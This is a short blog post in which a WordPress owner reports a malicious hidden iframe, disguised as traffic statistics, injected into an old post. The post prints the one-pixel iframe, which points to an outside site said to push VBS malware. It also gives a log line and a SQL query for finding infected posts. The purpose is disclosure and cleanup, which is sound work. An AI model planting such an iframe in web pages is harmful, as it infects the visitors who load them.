I was going through some old posts just now, and discovered this little treat embedded in a post:

<!-- Traffic Statistics -->
<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

The code that it’s loading (I know it doesn’t wrap, I don’t really care.) Code deleted. Thanks to Mike Peters for the follow-up in the comments:

This code got sql injected into your wp_posts.

Make sure you upgrade to the 2.3.2 version of WordPress:

http://wordpress.org/support/topic/151888

What it does is attempt to install a VBS malware on your machine using an xmlrpc exploit in older versions of WordPress.

Look for something like this in your server logs -

200.216.67.181 – - [28/Jan/2008:13:10:54 -0500] “POST /xmlrpc.php HTTP/1.0″

Once you view the post, you’re infected – the VBS code will be installed and you’re going to need to run NOD32 or AVG to clean it up

Someone with more patience than myself will probably take the time to disassemble that.

To find the post titles in your blog that might be affected, in SQL do:


mysql> select post_title from wp_posts where post_content like '%Statistics%';


If you like what’s here, please follow me on twitter here.